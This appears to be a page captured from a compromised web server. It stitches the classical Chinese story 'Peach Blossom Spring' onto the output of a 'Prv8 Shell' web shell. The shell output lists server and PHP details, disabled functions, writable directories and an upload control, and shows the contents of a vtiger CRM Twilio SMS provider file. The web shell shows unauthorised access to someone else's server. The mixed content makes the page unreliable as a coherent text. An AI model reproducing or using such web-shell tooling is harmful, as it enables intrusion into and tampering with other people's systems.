晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 .
Prv8 Shell
Server : Apache
System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64
User : rainic ( 1014)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/akaindir/www/crm/modules/SMSNotifier/providers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/akaindir/www/crm/modules/SMSNotifier/providers/Twilio.php
<?php
/*+**********************************************************************************
 * The contents of this file are subject to the vtiger CRM Public License Version 1.0
 * ("License"); You may not use this file except in compliance with the License
 * The Original Code is: vtiger CRM Open Source
 * The Initial Developer of the Original Code is vtiger.
 * Portions created by vtiger are Copyright (C) vtiger.
 * All Rights Reserved.
 ************************************************************************************/

class SMSNotifier_Twilio_Provider implements SMSNotifier_ISMSProvider_Model {

	private $userName;
	private $password;
	private $parameters = array();

	private $SERVICE_URI = 'https://api.twilio.com/2010-04-01/Accounts/{sid}/SMS/Messages';
	private static $REQUIRED_PARAMETERS = array(array('name'=>'AccountSID','label'=>'Account SID','type'=>'text'),
												array('name'=>'AuthToken','label'=>'Auth Token','type'=>'text'),
												array('name'=>'From','label'=>'From','type'=>'text'));

	/**
	 * Function to get provider name
	 * @return <String> provider name
	 */
	public function getName() {
		return 'Twilio';
	}

	/**
	 * Function to get required parameters other than (userName, password)
	 * @return <array> required parameters list
	 */
	public function getRequiredParams() {
		return self::$REQUIRED_PARAMETERS;
	}

	/**
	 * Function to get service URL to use for a given type
	 * @param <String> $type like SEND, PING, QUERY
	 */
	public function getServiceURL($type = false) {
		$accountSID = $this->getParameter('AccountSID');
		$this->SERVICE_URI = str_replace('{sid}', $accountSID, $this->SERVICE_URI);
		if($type) {
			switch(strtoupper($type)) {
				case self::SERVICE_AUTH:	return $this->SERVICE_URI . '/http/auth';
				case self::SERVICE_SEND:	return $this->SERVICE_URI . '/http/sendmsg';
				case self::SERVICE_QUERY:	return $this->SERVICE_URI . '/http/querymsg';
			}
		}
		return $this->SERVICE_URI;
	}

	/**
	 * Function to set authentication parameters
	 * @param <String> $userName
	 * @param <String> $password
	 */
	public function setAuthParameters($userName, $password) {
		$this->userName = $userName;
		$this->password = $password;
	}

	/**
	 * Function to set non-auth parameter.
	 * @param <String> $key
	 * @param <String> $value
	 */
	public function setParameter($key, $value) {
		$this->parameters[$key] = $value;
	}

	/**
	 * Function to get parameter value
	 * @param <String> $key
	 * @param <String> $defaultValue
	 * @return <String> value/$default value
	 */
	public function getParameter($key, $defaultValue = false) {
		if(isset($this->parameters[$key])) {
			return $this->parameters[$key];
		}
		return $defaultValue;
	}

	/**
	 * Function to prepare parameters
	 * @return <Array> parameters
	 */
	protected function prepareParameters() {
		foreach (self::$REQUIRED_PARAMETERS as $key=>$fieldInfo) {
			$params[$fieldInfo['name']] = $this->getParameter($fieldInfo['name']);
		}
		return $params;
	}

	/**
	 * Function to handle SMS Send operation
	 * @param <String> $message
	 * @param <Mixed> $toNumbers One or Array of numbers
	 */
	public function send($message, $toNumbers) {
		if(!is_array($toNumbers)) {
			$toNumbers = array($toNumbers);
		}
		$params = $this->prepareParameters();
		$httpClient = new Vtiger_Net_Client($this->getServiceURL());
		$httpClient->setHeaders(array('Authorization' => 'Basic '.base64_encode($params['AccountSID'].':'.$params['AuthToken'])));
		
		
		foreach($toNumbers as $toNumber) {
			$xmlResponse = $httpClient->doPost(array('From'=>$params['From'], 'To'=>$toNumber,'Body'=>$message));
			
			$xmlObject = simplexml_load_string($xmlResponse);
			$result = array();
			if($xmlObject->SMSMessage) {
				$result['id'] = (string)$xmlObject->SMSMessage->Sid;
				$status = (string)$xmlObject->SMSMessage->Status;
				$result['status'] = (string)$xmlObject->SMSMessage->Status;
				$result['to'] = (string)$xmlObject->SMSMessage->To;

				switch($status) {
					case 'queued'		:
					case 'sending'		:	$status = self::MSG_STATUS_PROCESSING;
											break;
					case 'sent'			:	$status = self::MSG_STATUS_DISPATCHED;
											break;
					case 'delivered'	:	$status = self::MSG_STATUS_DELIVERED;
											break;
					case 'undelivered'	:
					case 'failed'		:	$status = self::MSG_STATUS_FAILED;
											break;
				}
				$results[] = $result;
			} else {
				$result['error'] = true;
				$result['statusmessage'] = (string)$xmlObject->RestException->Message;
				$result['to'] = $toNumber;
				$results[] = $result;
			}
		}
		return $results;
	}

	/**
	 * Function to get query for status using messgae id
	 * @param <Number> $messageId
	 */
	public function query($messageId) {
		$params = $this->prepareParameters();
		$params['Sid'] = $messageId;

		$params = $this->prepareParameters();
		$httpClient = new Vtiger_Net_Client($this->getServiceURL().'/'.$messageId);
		$httpClient->setHeaders(array('Authorization' => 'Basic '.base64_encode($params['AccountSID'].':'.$params['AuthToken'])));
		
		$xmlResponse = $httpClient->doGet(array());
		$xmlObject = simplexml_load_string($xmlResponse);

		$result = array();
		$result['error'] = false;
		$status = (string)$xmlObject->Message->Status;

		switch($status) {
			case 'queued'		:
			case 'sending'		:	$status = self::MSG_STATUS_PROCESSING;
									$result['needlookup'] = 1;
									break;
								
			case 'sent'			:	$status = self::MSG_STATUS_DISPATCHED;
									$result['needlookup'] = 1;
									break;
								
			case 'delivered'	:	$status = self::MSG_STATUS_DELIVERED;
									$result['needlookup'] = 0;
									break;
								
			case 'undelivered'	:
			case 'failed'		:	
			default				:	$status = self::MSG_STATUS_FAILED;
									$result['needlookup'] = 1;
									break;
		}

		$result['status'] = $status;
		$result['statusmessage'] = $status;
		
		return $result;
	}

	function getProviderEditFieldTemplateName() {
		return 'Twilio.tpl';
	}
}
?>

haha - 2025